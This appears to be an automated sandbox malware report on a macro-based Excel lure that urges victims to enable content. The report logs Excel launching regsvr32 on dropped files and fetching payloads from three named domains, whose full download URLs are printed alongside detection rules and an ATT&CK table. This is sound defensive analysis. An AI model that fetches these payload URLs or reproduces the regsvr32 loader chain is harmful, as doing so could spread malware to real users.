    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 028E0688-7982-482A-A558-DEEDEEDCA262.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownDNS traffic detected: queries for: ohemaa.org
    Source: global trafficHTTP traffic detected: GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ohemaa.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: madieandme.com.auConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: amerident.com.doConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 172.93.99.178:443 -> 192.168.2.5:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 101.0.112.4:443 -> 192.168.2.5:49756 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.179.242.179:443 -> 192.168.2.5:49761 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
    Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: doc-220808714.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: doc-220808714.xlsOLE indicator, VBA macros: true
    Source: doc-220808714.xlsVirustotal: Detection: 13%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: doc-220808714.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.testJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.testJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.testJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{25FE220D-AF93-41AA-9976-6A196A4AA241} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal76.expl.winXLS@7/1@3/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: doc-220808714.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    doc-220808714.xls13%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    ohemaa.org0%VirustotalBrowse
    amerident.com.do1%VirustotalBrowse
    madieandme.com.au0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://roaming.edog.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.html0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://api.aadrm.com0%Avira URL Cloudsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
    https://amerident.com.do/xdOMlaB0XJ7/ocraf.html0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.html0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    ohemaa.org
    172.93.99.178
    truefalseunknown
    amerident.com.do
    108.179.242.179
    truefalseunknown
    madieandme.com.au
    101.0.112.4
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.htmlfalse
    • Avira URL Cloud: safe
    unknown
    https://amerident.com.do/xdOMlaB0XJ7/ocraf.htmlfalse
    • Avira URL Cloud: safe
    unknown
    https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.htmlfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
      high
      https://login.microsoftonline.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
        high
        https://shell.suite.office.com:1443028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
            high
            https://autodiscover-s.outlook.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
              high
              https://roaming.edog.028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
              • URL Reputation: safe
              unknown
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                high
                https://cdn.entity.028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkey028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                      high
                      https://powerlift.acompli.net028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                        high
                        https://cortana.ai028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                  high
                                  https://api.aadrm.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                        high
                                        https://cr.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                          high
                                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://portal.office.com/account/?ref=ClientMeControl028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                            high
                                            https://graph.ppe.windows.net028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.aadrm.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                            high
                                                            https://graph.windows.net028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                            high
                                                                                                            https://substrate.office.com/search/api/v2/init028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocation028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                        high
                                                                                                                        https://substrate.office.com/search/api/v1/SearchHistory028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorize028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/imports028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v2028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com028E0688-7982-482A-A558-DEEDEEDCA262.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                101.0.112.4
                                                                                                                                                madieandme.com.auAustralia
                                                                                                                                                55803DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUfalse
                                                                                                                                                108.179.242.179
                                                                                                                                                amerident.com.doUnited States
                                                                                                                                                46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                172.93.99.178
                                                                                                                                                ohemaa.orgUnited States
                                                                                                                                                23470RELIABLESITEUSfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                Analysis ID:501226
                                                                                                                                                Start date:12.10.2021
                                                                                                                                                Start time:17:20:58
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 6m 21s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:doc-220808714.xls
